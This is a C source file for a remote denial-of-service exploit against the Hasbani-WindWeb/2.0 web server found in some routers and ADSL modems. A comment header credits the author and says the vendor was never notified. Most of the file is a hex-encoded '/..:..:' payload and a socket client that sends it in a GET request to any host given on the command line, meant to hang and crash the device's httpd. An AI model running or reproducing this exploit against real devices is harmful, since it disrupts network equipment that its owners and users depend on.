/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 26\09\05 \/ |__| \/ \/
[i] Title: Hasbani-WindWeb/2.0 - HTTP GET Remote DoS
[i] Discovered by: Expanders
[i] Exploit by: Expanders
[ What is Hasbani-WindWeb/2.0 ]
Hasbani server is a httpd created for menaging ethernet routers and adsl modems.
[ Why HTTPD crash? ]
Causes of DoS are not perfecly known by me 'cos i can't debug a chip-integrated http daemon.
Btw seems that Hasbani enter a loop in a GET /..:..:..etc. condition, causes that when an attacker reguest a long crafted string
server enter an endless loop with conseguenly crash of the httpd.
NOTE: This exploit DON'T drop down victim's adsl connection!
[ Timeline ]
This vulnerability was not comunicated because i did'n find Hasbani's vendor.
[ Links ]
www.x0n3-h4ck.org
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define BUGSTR "GET %s HTTP/1.0\n\n\n" // Command where bug reside
char evilrequest[] = {
0x2f, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x78, 0x30, 0x6e, 0x33,
0x2d, 0x68, 0x34, 0x63, 0x6b, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a,
0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e,
0x3a, 0x2e, 0x2e, 0x3a, 0x2e, 0x2e, 0x3a, 0x2e,
0x2e, 0x3a, 0x2e, 0x2e };
fd_set readfds;
int banner();
int usage(char *filename);
int remote_connect( char* ip, unsigned short port );
int banner() {
printf("\n _______ ________ .__ _____ __ \n");
printf("___ __\\ _ \\ ____ \\_____ \\ | |__ / | | ____ | | __ \n");
printf("\\ \\/ / /_\\ \\ / \\ _(__ < ______ | | \\ / | |__/ ___\\| |/ / \n");
printf(" > <\\ \\_/ \\ | \\/ \\ /_____/ | Y \\/ ^ /\\ \\___| < \n");
printf("/__/\\_ \\\\_____ /___| /______ / |___| /\\____ | \\___ >__|_ \\ \n");
printf(" \\/ \\/ \\/ \\/ \\/ |__| \\/ \\/ \n\n");
printf("[i] Title: \tHasbani-WindWeb/2.0 - HTTP GET Remote DoS\n");
printf("[i] Discovered by: \tExpanders\n");
printf("[i] Proof of concept by:\tExpanders\n\n");
return 0;
}
int usage(char *filename) {
printf("Usage: \t%s HOST <port> :: default HTTPD port: 80\n\n",filename);
exit(0);
}
int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve \"%s\"\n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!\n" );
exit(1);
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!\n" );
exit(1);
}
return ( s );
}
int main(int argc, char *argv[]) {
int s,n;
unsigned int rcv;
char *request;
char recvbuf[256];
banner();
if( argc < 3)
argv[2] = "80";
else if ((atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534))
usage(argv[0]);
if( (argc < 2) )
usage(argv[0]);
request = (char *) malloc(1024);
printf("[+] Connecting to remote host\n");
s = remote_connect(argv[1],atoi(argv[2]));
sleep(1);
printf("[+] Creating buffer\n");
sprintf(request,BUGSTR,evilrequest);
printf("[+] Sending %d bytes of painfull buffer\n",strlen(evilrequest));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[X] Failed to send buffer\n");
close(s);
exit(1);
}
sleep(1);
printf("[+] Done, Packet Sent\n");
close(s);
free(request);
request = NULL;
return 0;
}